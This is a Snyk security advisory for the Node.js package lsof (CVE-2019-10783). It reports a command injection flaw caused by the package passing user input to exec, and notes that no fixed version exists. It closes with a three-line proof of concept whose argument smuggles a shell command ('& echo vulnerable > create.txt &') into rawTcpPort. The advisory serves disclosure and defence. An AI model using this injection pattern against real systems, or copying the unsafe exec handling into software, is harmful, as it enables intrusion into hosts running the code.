Command Injection Affecting lsof package, versions *
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
2.93% (90th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-LSOF-543632
- published 29 Jan 2020
- disclosed 29 Jan 2020
- credit JHU System Security Lab
Introduced: 29 Jan 2020
CVE-2019-10783 Open this link in a new tabHow to fix?
There is no fixed version for lsof.
Overview
lsof is a lsof processor for node.
Affected versions of this package are vulnerable to Command Injection. Multiple areas of the package is vulnerable to command injection. Every exported method used by the packages uses the exec function to parse user input.
PoC by JHU System Security Lab
var root = require("lsof");
var attack_code = "& echo vulnerable > create.txt &";
root.rawTcpPort(attack_code, function(){});